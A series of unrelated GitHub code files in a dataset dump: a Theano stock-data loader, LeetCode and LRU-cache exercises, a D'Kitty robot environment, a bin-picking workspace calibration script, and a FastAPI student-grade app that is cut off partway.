return data_set_x[0:new_len], data_set_y\n '''\n def joint_x_gen_y(self, data_set_x):\n # 用于日线数据的拼接和生成类号\n data_set_y = []\n new_len = len(data_set_x)-self._seq_length\n for i in range(new_len):\n if data_set_x[i+self._seq_length-1][self._axis1] > data_set_x[i+self._seq_length][self._axis2]:\n data_set_y.append(0)\n else:\n data_set_y.append(1)\n\n for j in range(self._seq_length-1):\n data_set_x[i].extend(data_set_x[i+j+1])\n\n return data_set_x[0:new_len], data_set_y\n\n def load_data(self, data_path):\n print(\"Loading data from {} ...\".format(data_path))\n data = open(data_path, 'r')\n data_set_x = []\n for line in data:\n data_set_x.append(line.split('\\n')[0].split(self._delimiter)[self._row_start:self._row_end])\n data.close()\n if self._del_table_header:\n data_set_x = data_set_x[1::]\n\n return data_set_x\n\n def minmax_norm(self, data_set):\n data = np.zeros((len(data_set), len(data_set[0]))) \n\n for i in range(len(data_set)):\n for j in range(len(data_set[0])):\n data[i][j] = data_set[i][j]\n\n max = np.amax(data, axis=0)\n min = np.amin(data, axis=0)\n\n for i in range(data.shape[0]):\n data[i] = (data[i] - min) / (max - min)\n\n return data\n\n def shared_dataset_x(self, data_set_x, borrow=True):\n shared_x = theano.shared(np.asarray(data_set_x, dtype=theano.config.floatX), borrow=borrow)\n\n return shared_x\n\n def shared_dataset_y(self, data_set_y, borrow=True):\n shared_y = theano.shared(np.asarray(data_set_y,dtype=theano.config.floatX),borrow=borrow)\n\n return T.cast(shared_y, 'int32')\n\n def get_datasets(self, datapath):\n '''\n params:\n ------\n datapath: list\n 加载的路径列表\n return: \n ------\n 以列表的形式返回所有的数据集和类号\n '''\n unshared_datasets = []\n shared_datasets = []\n for i in range(len(datapath)):\n #data_set_x, data_set_y = self.load_data(datapath[i])\n data_set_x = self.load_data(datapath[i])\n data_set_x, data_set_y = self.joint_x_gen_y(data_set_x)\n unshared_datasets.append((data_set_x, data_set_y))\n # 归一化\n data_set_x = self.minmax_norm(data_set_x)\n # 转化为共享变量\n data_set_x = self.shared_dataset_x(data_set_x)\n data_set_y = self.shared_dataset_y(data_set_y)\n shared_datasets.append((data_set_x, data_set_y))\n\n return shared_datasets, unshared_datasets\n\n\nclass DataHandle_minute(DataHandle):\n def __init__(self, seq_length=10, row_interval=[1, 5], axes=[0, 0],\n delimiter='\\t', del_table_header=True, row_mid=2):\n # 调用父类的init函数\n DataHandle.__init__(self, seq_length, row_interval, axes, delimiter,\n del_table_header)\n self._row_mid = row_mid\n \n\n def joint_x_gen_daily(self, data_set_x):\n '''\n 在处理分钟数据时,data_set_x的前两唯是日期和分钟时刻\n return: 拼接好的分钟数据和计算后的日线数据\n '''\n data_range = []\n data_range.append(0)\n for i in xrange(len(data_set_x)):\n if data_set_x[i][0] != data_set_x[data_range[-1]][0]:\n data_range.append(i)\n data_range.append(len(data_set_x))\n\n\n data_daily = [] # 存放由分钟时刻数据计算出的日线数据\n data_minute = [] # 存放拼接后的每天的分钟时刻数据\n for i in range(len(data_range)-1):\n open_price = data_set_x[data_range[i]][self._row_mid]\n close_price = data_set_x[data_range[i+1]-1][self._row_mid+3]\n high_price = 0\n low_price = 100000\n minute_item = [] # 存放拼接后某一天的分钟时刻数据\n for j in range(data_range[i], data_range[i+1]):\n for k in range(self._row_mid, self._row_end):\n minute_item.append(float(data_set_x[j][k]))\n if high_price < float(data_set_x[j][self._row_mid+1]):\n high_price = float(data_set_x[j][self._row_mid+1])\n if low_price > float(data_set_x[j][self._row_mid+2]):\n low_price = float(data_set_x[j][self._row_mid+2])\n data_minute.append(minute_item)\n # 当天的数据\n 
data_daily.append([float(open_price), high_price, float(close_price), low_price]) \n\n for item in data_minute:\n assert(len(item)%48==0)\n break\n with open('tmp.txt', 'wb') as f:\n for item in data_daily:\n f.write('%s\\n' % item)\n\n with open('tmp2.txt', 'wb') as f:\n for item in data_minute:\n f.write('%s\\n' % item)\n '''\n 暂时不考虑数据损坏的情况,如出现11:35,15:05\n bad_data = []\n for i in range(len(data_range)-1):\n if data_range[i+1] - data_range[i] != 48:\n print(data_range[i+1])\n #print(len(data_range))\n '''\n\n\n return data_daily, data_minute \n\n def get_datasets(self, datapath):\n '''\n params:\n ------\n datapath: list\n 加载的路径列表\n return: \n ------\n unshared_datasets: 为LSTM准备的数据集\n shared_datasets: 为RBMs准备的数据集\n 以列表的形式返回所有的数据集和类号\n '''\n\n unshared_datasets = []\n shared_datasets = []\n for i in range(len(datapath)):\n data_set_x = self.load_data(datapath[i])\n data_daily, data_minute = self.joint_x_gen_daily(data_set_x)\n data_daily_x, data_daily_y = self.joint_x_gen_y(data_daily)\n unshared_datasets.append((data_minute, data_daily_y)) \n # 归一化\n data_minute = self.minmax_norm(data_minute)\n # 转化为共享变量\n data_minute = self.shared_dataset_x(data_minute)\n shared_datasets.append(data_minute)\n\n return shared_datasets, unshared_datasets\n \n\n\n \n","repo_name":"tingjianlau/tjliu-DeepLearningTutorials","sub_path":"DataHandle.py","file_name":"DataHandle.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"33038052248","text":"class Solution:\n def validPalindrome(self, s: str) -> bool:\n l=0\n r=len(s)-1\n while l<r:\n if s[l]!=s[r]:\n skipleft=s[l+1:r+1]\n print(skipleft)\n print(r+1)\n skipright=s[l:r]\n print(r)\n print(skipright)\n print(skipright[::-1])\n return (skipleft[::-1]==skipleft or skipright[::-1]==skipright)\n l+=1 \n r-=1\n return True\n ","repo_name":"niksintelli4ever/LeetCode-Journey","sub_path":"0680-valid-palindrome-ii/0680-valid-palindrome-ii.py","file_name":"0680-valid-palindrome-ii.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42904474599","text":"\"\"\"\nmaps and double linked list\na double linked list can be used as a LRU cache\na dictionary can be used to map the keys to the nodes to facilitate constant, i.e. O(1), lookups insertions and deletions\nadded print lines to the cache lookups to see value in console.\n\n\"\"\"\n\nclass Node():\n def __init__(self, key=0, value=0):\n self.next = None\n self.prev = None\n self.value = value\n self.key = key\n\nclass LRU_Cache(object):\n\n def __init__(self, capacity=5):\n # Initialize class variables\n self.maxsize = capacity\n self.map = dict() #should be a map of the key and the node for the value\n self.head = None\n self.tail = None\n\n pass\n\n def get(self, key):\n # Retrieve item from provided key. 
Return -1 if nonexistent.\n cache_map = self.map\n cache_node = cache_map.get(key)\n if self.head == cache_node:\n return cache_node.value\n if cache_node != None:\n if self.tail != cache_node:\n nxt = cache_node.next\n if nxt.prev != None:\n nxt.prev = cache_node.prev\n elif self.tail == cache_node:\n self.tail = cache_node.prev\n prev = cache_node.prev\n if prev.next != None:\n prev.next = cache_node.next\n head = self.head\n head.prev = cache_node \n cache_node.next = head\n cache_node.prev = None\n self.head = cache_node\n\n return cache_node.value\n\n return -1\n pass\n\n def set(self, key, value):\n # Set the value if the key is not present in the cache. If the cache is at capacity remove the oldest item. \n cache_map = self.map\n cache_item = Node(key, value)\n if self.head == None:\n self.head = cache_item\n self.tail = cache_item\n else:\n if len(cache_map) == self.maxsize:\n tail = self.tail\n cache_map.pop(tail.key)\n self.tail = tail.prev\n\n cache_item.next = self.head\n old_head = self.head\n old_head.prev = cache_item\n self.head = cache_item\n\n cache_map[key] = cache_item \n pass\n\nour_cache = LRU_Cache(5)\nsecond_cache = LRU_Cache()\nthird_cache = LRU_Cache(-1)\n\nour_cache.set(1, 1)\nour_cache.set(2, 2)\nour_cache.set(3, 3)\nour_cache.set(4, 4)\n\nprint(\"First test\")\nprint(our_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nour_cache.set(5, 5) \nour_cache.set(6, 6)\n\nprint(our_cache.get(6))\nprint(our_cache.get(3)) # returns -1 because the cache reached it's capacity and 3 was the least recently used entry\n\nsecond_cache.set(1, 1)\nsecond_cache.set(2, 2)\nsecond_cache.set(3, 3)\nsecond_cache.set(4, 4)\n\nprint(\"Second test\")\nprint(second_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nsecond_cache.set(5, 5) \nsecond_cache.set(6, 6)\n\nprint(second_cache.get(6))\nprint(second_cache.get(3))\n\nthird_cache.set(1, 1)\nthird_cache.set(2, 2)\nthird_cache.set(3, 3)\nthird_cache.set(4, 4)\n\nprint(\"Third test\")\nprint(third_cache.get(1)) # returns 1\nprint(third_cache.get(2)) # returns 2\nprint(third_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nthird_cache.set(5, 5) \nthird_cache.set(6, 6)\n\nprint(third_cache.get(6))\nprint(third_cache.get(3)) ","repo_name":"reaprman/Data-Struct-algo-nanodegree","sub_path":"proj2/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74856295623","text":"import abc\nfrom typing import Any, Dict, Optional, Sequence, Tuple\n\nimport gym\nimport numpy as np\nfrom transforms3d.euler import euler2mat, mat2euler\n\nfrom dsuite.components.robot import DynamixelRobotComponent, RobotState\nfrom dsuite.components.tracking import VrTrackerComponent, TrackerState\nfrom dsuite.dkitty.config import (\n DEFAULT_DKITTY_CALIBRATION_MAP, DKITTY_SIM_CONFIG, DKITTY_HARDWARE_CONFIG,\n TRACKER_SIM_CONFIG, TRACKER_HARDWARE_CONFIG)\nfrom dsuite.dkitty import scripted_reset\nfrom dsuite.robot_env import make_box_space, RobotEnv\n\n# The position offset for tracking in hardware.\nKITTY_HW_TRACKER_OFFSET = np.array([0, 0, 0.35])\n\n\nclass BaseDKittyEnv(RobotEnv, metaclass=abc.ABCMeta):\n \"\"\"Base environment for all DKitty robot tasks.\"\"\"\n\n @classmethod\n def get_robot_config(cls,\n device_path: Optional[str] = 
None) -> Dict[str, Any]:\n \"\"\"Returns the robot configuration for the given device path.\"\"\"\n if device_path is not None:\n config = DKITTY_HARDWARE_CONFIG.copy()\n config['device_path'] = device_path\n scripted_reset.add_groups_for_reset(config['groups'])\n # Calibrate the configuration groups.\n DEFAULT_DKITTY_CALIBRATION_MAP.update_group_configs(config)\n else:\n config = DKITTY_SIM_CONFIG\n return config\n\n @classmethod\n def get_tracker_config(cls, **device_identifiers) -> Dict[str, Any]:\n \"\"\"Returns the robot configuration for the given device path.\"\"\"\n # Filter out None entries.\n device_identifiers = {\n name: device_id\n for name, device_id in device_identifiers.items()\n if device_id is not None\n }\n if device_identifiers:\n config = TRACKER_HARDWARE_CONFIG.copy()\n for name, device_id in device_identifiers.items():\n config['groups'][name]['device_identifier'] = device_id\n else:\n config = TRACKER_SIM_CONFIG\n return config\n\n def __init__(self,\n *args,\n robot_config: Dict[str, Any],\n tracker_config: Dict[str, Any],\n manual_reset: bool = False,\n **kwargs):\n \"\"\"Initializes the environment.\n\n Args:\n robot_config: A dictionary of keyword arguments to pass to\n RobotComponent.\n tracker_config: A dictionary of keyword arguments to pass to\n TrackerComponent.\n manual_reset: If True, waits for the user to reset the robot\n instead of performing the automatic reset procedure.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.robot = self._add_component(**robot_config)\n self.tracker = self._add_component(**tracker_config)\n self.manual_reset = manual_reset\n\n # Disable the constraint solver in hardware so that mimicked positions\n # do not participate in contact calculations.\n if self.has_hardware_robot:\n self.sim_scene.disable_option(constraint_solver=True)\n\n @property\n def has_hardware_robot(self) -> bool:\n \"\"\"Returns true if the environment is using a hardware robot.\"\"\"\n return isinstance(self.robot, DynamixelRobotComponent)\n\n @property\n def has_hardware_tracker(self) -> bool:\n \"\"\"Returns true if the environment is using a hardware tracker.\"\"\"\n return isinstance(self.tracker, VrTrackerComponent)\n\n def initialize_action_space(self) -> gym.Space:\n \"\"\"Returns the observation space to use for this environment.\"\"\"\n qpos_indices = self.robot.get_config('dkitty').qpos_indices\n return make_box_space(-1.0, 1.0, shape=(qpos_indices.size,))\n\n def _reset_dkitty_standing(self,\n root_pos: Optional[Sequence[float]] = None,\n root_vel: Optional[Sequence[float]] = None,\n kitty_pos: Optional[Sequence[float]] = None,\n kitty_vel: Optional[Sequence[float]] = None):\n \"\"\"Resets the D'Kitty to a standing position.\n\n Args:\n root_pos: The root position (x, y, z, rx, ry, rz) of the\n D'Kitty. 
(x, y, z) are in meters, rx, ry, rz are in radians.\n root_vel: The root velocity of the D'Kitty.\n kitty_pos: The joint positions (radians).\n kitty_vel: The joint velocities (radians/second).\n \"\"\"\n # Set defaults if parameters are not given.\n root_init_state, kitty_init_state = self.robot.get_initial_state(\n ['root', 'dkitty'])\n root_pos = (\n root_init_state.qpos if root_pos is None else np.asarray(root_pos))\n root_vel = (\n root_init_state.qvel if root_vel is None else np.asarray(root_vel))\n kitty_pos = (\n kitty_init_state.qpos\n if kitty_pos is None else np.asarray(kitty_pos))\n kitty_vel = (\n kitty_init_state.qvel\n if kitty_vel is None else np.asarray(kitty_vel))\n\n # For simulation, simply set the state.\n if not isinstance(self.robot, DynamixelRobotComponent):\n self.robot.set_state({\n 'root': RobotState(qpos=root_pos, qvel=root_vel),\n 'dkitty': RobotState(qpos=kitty_pos, qvel=kitty_vel),\n })\n return\n\n # Perform the scripted reset if we're not doing manual resets.\n if not self.manual_reset:\n scripted_reset.reset_standup(self.robot)\n\n # Move to the desired position.\n self.robot.set_state({\n 'dkitty': RobotState(qpos=kitty_pos, qvel=kitty_vel),\n })\n if self.manual_reset:\n # Prompt the user to start the episode.\n input('Press Enter to start the episode...')\n\n # Reset the hardware tracking position to consider the current world\n # position of the D'Kitty as the desired reset position.\n if self.has_hardware_tracker:\n self.tracker.set_state({\n 'torso': TrackerState(\n pos=root_pos[:3] + KITTY_HW_TRACKER_OFFSET,\n rot=euler2mat(*root_pos[3:6]),\n )\n },)\n self.robot.reset_time()\n\n def _get_root_qpos_qvel(\n self,\n root_robot_state: RobotState,\n torso_tracker_state: TrackerState,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Returns the root position and velocity of the robot.\n\n This is needed because we use a free joint to track the D'Kitty position\n for simulation, but we use a site tracker for hardware.\n \"\"\"\n if self.has_hardware_tracker:\n # Use hardware tracking as the root position and mimic back to sim.\n root_qpos = np.concatenate([\n torso_tracker_state.pos - KITTY_HW_TRACKER_OFFSET,\n mat2euler(torso_tracker_state.rot),\n ])\n self.data.qpos[:6] = root_qpos\n # TODO(michaelahn): Calculate angular velocity from tracking.\n root_qvel = np.zeros(6)\n else:\n root_qpos = root_robot_state.qpos\n root_qvel = root_robot_state.qvel\n return root_qpos, root_qvel\n","repo_name":"justinvyu/dsuite","sub_path":"dsuite/dkitty/base_env.py","file_name":"base_env.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7819213391","text":"'''''''''\nA Python scripts to set the workspace size \nAuthor: xinyi\nDate: 20210721\n---\nDefine workspace for bin picking task and update config file!\nStep 1 - Drag to select 2 or 4 rectangles and press [ENTER]\nStep 2 - Click to select 2 or 4 points and press [ENTER]\n[r] - refresh and reselect\n[q] - quit\n'''\nimport argparse\nimport cv2\nfrom bpbot.config import BinConfig\nfrom bpbot.device import PhxClient\nfrom bpbot.utils import *\n\nclass Workspace(object):\n def __init__(self, cfg_path=None):\n self.cfg = BinConfig(config_path=cfg_path, pre=False)\n self.cfgdata = self.cfg.data\n self.vis = None \n self.clone = None\n\n self.boxes = []\n self.points = []\n self.mat = np.loadtxt(self.cfgdata['calibmat_path'])\n\n def capture(self):\n pxc = PhxClient(host='127.0.0.1:18300')\n pxc.triggerframe()\n pc = 
pxc.getpcd()\n self.pc = pc\n \n self.grayscale = pxc.getgrayscaleimg()\n self.clone = cv2.cvtColor(self.grayscale, cv2.COLOR_GRAY2BGR)\n self.vis = self.clone.copy()\n \n pc = pc/1000\n H = np.loadtxt(self.cfgdata['calibmat_path'])\n pc_ = np.c_[pc, np.ones(pc.shape[0])]\n pr = np.dot(H, pc_.T).T\n self.arr = np.reshape(pr[:,2], (self.cfgdata['height'], self.cfgdata['width']))\n\n def recog_ar_marker(self, ids=[7]): \n self.capture()\n image = cv2.cvtColor(self.grayscale, cv2.COLOR_GRAY2RGB)\n recog_ids = detect_ar_marker(image.copy(), show=True)\n cv2.waitKey(2)\n for id in ids:\n if id in recog_ids.keys():\n x,y = recog_ids[id]\n p = self.pc[y*image.shape[1]+x]/1000\n\n p_robot = np.dot(self.mat, [*p, 1]) # unit: m\n p_robot = p_robot[:3]\n print(f\"=> Detected #{id}!\")\n print(f\" Camera ({p[0]:.3f},{p[1]:.3f},{p[2]:.3f})\")\n print(f\" Robot ({p_robot[0]:.3f},{p_robot[1]:.3f},{p_robot[2]:.3f})\")\n else: \n print(\"Marker #{id} not detected\")\n \n\n def refresh_drag(self): \n self.vis = self.clone.copy()\n self.boxes.clear()\n def refresh_click(self):\n self.vis = self.clone.copy()\n self.points.clear()\n\n def on_drag(self, event, x, y, flags, params):\n # global img\n if event == cv2.EVENT_LBUTTONDOWN:\n print(f\"Start Mouse Position: {x},{y}\")\n sbox = [x, y]\n self.boxes.append(sbox)\n\n elif event == cv2.EVENT_LBUTTONUP:\n print(f\"End Mouse Position: {x},{y}\")\n ebox = [x, y]\n self.boxes.append(ebox)\n cv2.rectangle(self.vis, (self.boxes[-2][0], self.boxes[-2][1]), (self.boxes[-1][0], self.boxes[-1][1]), (0,255,0), 3)\n \n def on_click(self, event, x, y, flags, params):\n if event == cv2.EVENT_LBUTTONDOWN:\n print(f\"Mouse Position: {x},{y}, => {self.arr[y,x]:.3f}\")\n cv2.circle(self.vis,(x,y),5,(0,255,0),-1)\n self.points.append([x,y])\n \n def select_points(self):\n self.points = []\n while(True):\n cv2.namedWindow('Click')\n cv2.setMouseCallback('Click', self.on_click, 0)\n cv2.imshow('Click', self.vis)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('r'):\n self.refresh_click()\n if key == ord('q'):\n cv2.destroyAllWindows()\n break\n if key == ord('a'):\n self.auto_define()\n break\n\n if len(self.points) <= 4 and key == 13: # enter\n cv2.destroyAllWindows()\n break\n\n def auto_define(self):\n self.points = []\n top_id = 28\n bottom_ids = [21,22]\n real_d = 20+20+29/3\n\n image = cv2.cvtColor(self.grayscale, cv2.COLOR_GRAY2RGB)\n ids = detect_ar_marker(image.copy(), show=True)\n cv2.waitKey(2)\n if top_id in ids:\n x,y = ids[top_id]\n pick_max = self.arr[y,x]\n print(f\"Detected top: {x},{y}, => {pick_max:.3f}\")\n if bottom_ids[0] in ids and bottom_ids[1] in ids:\n x0, y0 = ids[bottom_ids[0]]\n x1, y1 = ids[bottom_ids[1]]\n pixel_d = calc_2points_distance((x0,y0),(x1,y1))\n pick_min = (self.arr[y0,x0]+self.arr[y1,x1])/2\n print(f\"Detected bottom: {x},{y}, => {pick_min:.3f}\")\n \n self.cfgdata['main']['height']['min'] = float(pick_min)-0.002\n self.cfgdata['main']['height']['max'] = float(pick_max)\n self.cfgdata['real2pixel'] = float(pixel_d/real_d)\n self.cfg.write()\n\n print(\"Successfully defined **height** of picking workspace! 
\")\n\n def select_boxes(self):\n self.boxes = []\n while(True):\n cv2.namedWindow('Drag')\n cv2.setMouseCallback('Drag', self.on_drag, 0)\n cv2.imshow('Drag', self.vis)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('r'):\n self.refresh_drag()\n if key == ord('q'):\n cv2.destroyAllWindows()\n break\n if len(self.boxes)/2 <= 2 and key == 13: # enter\n cv2.destroyAllWindows()\n break\n\n def select(self):\n self.select_boxes()\n self.select_points()\n\n def define(self):\n if len(self.boxes) == 4:\n self.cfgdata['main']['area']['left'] = self.boxes[0][0]\n self.cfgdata['main']['area']['top'] = self.boxes[0][1]\n self.cfgdata['main']['area']['right'] = self.boxes[1][0]\n self.cfgdata['main']['area']['bottom'] = self.boxes[1][1]\n self.cfgdata['buffer']['area']['left'] = self.boxes[2][0]\n self.cfgdata['buffer']['area']['top'] = self.boxes[2][1]\n self.cfgdata['buffer']['area']['right'] = self.boxes[3][0]\n self.cfgdata['buffer']['area']['bottom'] = self.boxes[3][1]\n self.cfg.write()\n print(\"Successfully defined **area** of picking workspace! \")\n print(\"Successfully defined **area** of dropping workspace! \")\n\n elif len(self.boxes) == 2:\n self.cfgdata['main']['area']['left'] = self.boxes[0][0]\n self.cfgdata['main']['area']['top'] = self.boxes[0][1]\n self.cfgdata['main']['area']['right'] = self.boxes[1][0]\n self.cfgdata['main']['area']['bottom'] = self.boxes[1][1]\n self.cfg.write()\n print(\"Successfully defined **area** of picking workspace! \")\n\n else:\n print(\"Did not calibrate area of workspace! \")\n\n if len(self.points) == 4:\n h = [self.arr[self.points[0][1], self.points[0][0]], self.arr[self.points[1][1], self.points[1][0]]]\n [pick_min, pick_max] = h if h[0] < h[1] else [h[1], h[0]]\n\n h = [self.arr[self.points[2][1], self.points[2][0]], self.arr[self.points[3][1], self.points[3][0]]]\n [drop_min, drop_max] = h if h[0] < h[1] else [h[1], h[0]]\n self.cfgdata['main']['height']['min'] = float(pick_min)\n self.cfgdata['main']['height']['max'] = float(pick_max)\n self.cfgdata['buffer']['height']['min'] = float(drop_min)\n self.cfgdata['buffer']['height']['max'] = float(drop_max)\n self.cfg.write()\n print(\"Successfully defined **height** of picking workspace! \")\n print(\"Successfully defined **height** of dropping workspace! \")\n\n elif len(self.points) == 2:\n h = [self.arr[self.points[0][1], self.points[0][0]], self.arr[self.points[1][1], self.points[1][0]]]\n [pick_min, pick_max] = h if h[0] < h[1] else [h[1], h[0]]\n self.cfgdata['main']['height']['min'] = float(pick_min)\n self.cfgdata['main']['height']['max'] = float(pick_max)\n self.cfg.write()\n print(\"Successfully defined **height** of picking workspace! \")\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('mode', type=str, help='marker or none')\n parser.add_argument('--file_path','-f', type=str, help='if you want to save a new config file, enter the file path')\n args = parser.parse_args()\n \n ws = Workspace(args.file_path)\n\n if args.mode == 'marker':\n ws.recog_ar_marker()\n else:\n print(\"Define workspace for bin picking task and update config file! 
\")\n print(\"Step 1 - Drag to select 2 or 4 rectangles and press [ENTER]\")\n print(\"Step 2 - Click to select 2 or 4 points and press [ENTER]\")\n print(\"[r] - refresh and reselect\")\n print(\"[q] - quit\")\n print(\"[a] - automatically define the height\")\n \n ws.capture()\n ws.select()\n ws.define()\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinyiz0931/bin-picking-robot","sub_path":"example/run_workspace.py","file_name":"run_workspace.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"26932034699","text":"\nimport os\nimport webbrowser\nfrom fastapi import FastAPI, Depends, HTTPException, Response\nfrom typing import Union\nfrom fastapi.responses import HTMLResponse\nfrom sqlalchemy import and_\nimport sql.models as models\nfrom database import engine, get_db\nimport sqlite3\nimport time\nfrom sql.default_data import Connect\nfrom sqlalchemy.orm import Session\nimport sql.schemas as schema\nimport numpy as np\nimport pandas as pd\nimport description as des\n\n\nmodels.Base.metadata.create_all(bind = engine)\n#Connect()\nwhile True:\n try:\n conn = sqlite3.connect('StudentGrade.db')\n cursor = conn.cursor()\n print(\"Database connected\")\n break\n except Exception as error:\n print (\"Database Connection Failed\")\n print(\"Error\", error)\n time.sleep(2)\n\n\napp = FastAPI( title= \"Quản lý điểm sinh viên\",\n description= des.description, openapi_tags= des.tags,\n contact={\n \"name\" : \"Source code\",\n \"url\" : \"https://github.com/potatoArthurDo/Python-K1N2/tree/main\"\n } )\n\n@app.get('/', response_class=HTMLResponse, tags=['Trang chủ'])\ndef home():\n html_content = '''\n <!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>Document\n\n\n

BÀI TẬP LỚN MÔN PYTHON

\n
Nhóm 5
\n
Quản lý điểm sinh viên
\n
Thành viên:
\n
    \n
  • A37527 - Đỗ Anh Thư
  • \n
  • A38322 - Trần Văn Tú
  • \n
  • A38221 - Vũ Thế Dương
  • \n
\n\n'''\n return HTMLResponse(content=html_content, status_code=200)\n \n\n\n################## AnhThu numpy \n# Calculate the percentage of non zero final scores\n@app.get(\"/NonZeroNP\", tags=['Anh Thư Numpy'],\n description=des.des_api['AnhThuNP']['ThongKeDiem0'])\ndef non_zero(db: Session = Depends(get_db)):\n query_rs = db.query(models.Grade.final.label(\"Grade\")).all()\n array = np.array(query_rs)\n np.reshape(array, -1)\n non = np.count_nonzero(array)/100\n return {\n \"msg\" : f'The percentage of score that is not zero is {non}%',\n #\"comment\" : f'Quite realistic if you compare it to this class s mid-score report, lol',\n \"data\" : non\n }\n\n\n\n#Change student's one subject score \n@app.post(\"/ChangeScoreNP\", tags=['Anh Thư Numpy'],\n description=des.des_api['AnhThuNP']['CapNhatDiemSo'])\ndef get_change(student : schema.UpdateScore, db : Session = Depends(get_db)):\n if student.studentID > 0:\n if student.subjectID > 0 and student.subjectID < 6:\n if student.midScore < 4:\n student.endScore = 0\n db.query(models.Grade).filter(\n and_(\n models.Grade.student_id == student.studentID,\n models.Grade.subject_id == student.subjectID\n )\n ).update({\n 'mid_term' : student.midScore,\n 'end_term' : 0,\n 'final' : 0\n\n })\n else:\n\n db.query(models.Grade).filter(\n and_(\n models.Grade.student_id == student.studentID,\n models.Grade.subject_id == student.subjectID\n )\n ).update({\n 'mid_term' : student.midScore,\n 'end_term' : student.endScore,\n 'final' :np.round( student.midScore * 0.3 + student.endScore * 0.7)\n\n })\n db.commit()\n query_rs = db.query(models.Student.name.label(\"Name\"),\n models.Subject.name.label(\"Subject\"),\n models.Grade.mid_term.label(\"Mid Term\"),\n models.Grade.end_term.label(\"End Term\"),\n models.Grade.final.label(\"Final\")).select_from(models.Student).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Grade.student_id== student.studentID,\n models.Grade.subject_id == student.subjectID\n\n )\n ).all()\n df = pd.DataFrame.from_dict(query_rs)\n return df.T\n else:\n raise HTTPException(status_code=404, detail= {\n \"field\" : \"subjectID\",\n \"msg\" : \"Subject ID is a number from 1 to 5\"\n })\n\n else:\n raise HTTPException(status_code=404, detail= {\n \"field\" : \"studentID\",\n \"msg\" : \"Student ID must be larger than 0\"\n })\n \n\n\n\n################## AnhThu pandas\n#Students that achived score \"10\" for final, return a html table\n@app.get(\"/getTopPD\", tags=['Anh Thư Pandas'],\n description= des.des_api['AnhThuPD']['DanhSachDiem10'])\ndef get_top(db : Session = Depends(get_db)):\n query_rs = db.query(models.Student.name.label(\"Name\"), models.Subject.name.label(\"Subject\"),\n models.Grade.final.label(\"Score\")).filter(\n models.Grade.final == 10 ).join(models.Student).join(models.Subject).all()\n df = pd.DataFrame.from_dict(query_rs)\n table = df.to_html()\n text_file = open(\"list.html\", \"w\")\n text_file.write(table)\n text_file.close()\n webbrowser.open(os.getcwd() + '/list.html')\n return HTMLResponse(content = table, status_code = 200)\n\n#Students that achived the same score as the input\n@app.post(\"/getSimilarPD\", tags=['Anh Thư Pandas'],\n description=des.des_api['AnhThuPD']['DanhSachGiongNhau'])\ndef get_similar(score : schema.ScoreBase, db : Session = Depends(get_db)):\n if score.midScore < 0 or score.endScore < 0:\n raise HTTPException(status_code=404, detail= {\n \"field\" : \"midScore,endScore\",\n \"msg\" : \"Score must be postitive\"\n })\n else:\n if score.midScore < 4:\n score.endScore = 0\n 
data = db.query(\n models.Student.id.label(\"Student ID\"),\n models.Student.name.label(\"Student Name\"),\n models.Class.name.label(\"Class\"),\n models.Subject.name.label(\"Subject\"),\n models.Grade.mid_term.label(\"Mid term\"),\n models.Grade.end_term.label(\"End term\")\n ).select_from(models.Student).join(models.Class).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Grade.mid_term == score.midScore,\n models.Grade.end_term == score.endScore\n )\n ).all()\n df = pd.DataFrame.from_dict(data)\n if (data == []) :\n return {\"result\" : \"No data\"}\n table = df.to_html()\n text_file = open(\"similar_list.html\", \"w\")\n text_file.write(table)\n text_file.close()\n webbrowser.open(os.getcwd() + '/similar_list.html')\n return HTMLResponse(content = table, status_code = 200)\n\n############################## VuDuong Region\n## np\n## Lấy sĩ số lớp dựa theo mã lớp\n@app.post('/subject/GetClassSize', tags=[\"Thế Dương Numpy\"],\n description= des.des_api['TheDuongNP']['SiSoLop'])\n\ndef Send_Id_GetClassSz(classID : schema.ClassBase , db: Session = Depends(get_db)):\n if classID.classID != None and classID.classID > 0:\n classSz = db.query(models.Student).join(models.Class).filter(models.Class.id == classID.classID).all()\n fullClass = db.query(models.Class).all()\n #Tổng số sinh viên trong lớp\n num_Student_inClass = len(np.array(classSz))\n #Tổng số lớp\n allClass = len(np.array(fullClass))\n\n if (classID.classID > allClass):\n return f\"Mã lớp {classID.classID} không tồn tại !\"\n else:\n return f\"Sĩ số lớp có mã lớp {classID.classID} là {num_Student_inClass} sinh viên \"\n else:\n raise HTTPException(status_code=404, detail=\n f\"Mã lớp {classID.classID} không hợp lệ !\"\n )\n#np\n#Hiển thị điểm trung bình môn theo mã lớp, mã môn\n@app.get('/subject/ClassSubjectAvgPoint/{classid}/{subjectid}',\n tags = ['Thế Dương Numpy'],\n description= des.des_api['TheDuongNP']['TrungBinhMon'])\n\ndef get_avg_point_subject( classid: Union[int, None] = None, subjectid: Union[int, None] = None , db: Session = Depends(get_db)):\n if classid > 0:\n if subjectid > 0:\n classPoint = db.query( models.Subject.name.label('Môn học'),\n models.Class.name.label('Lớp'),\n 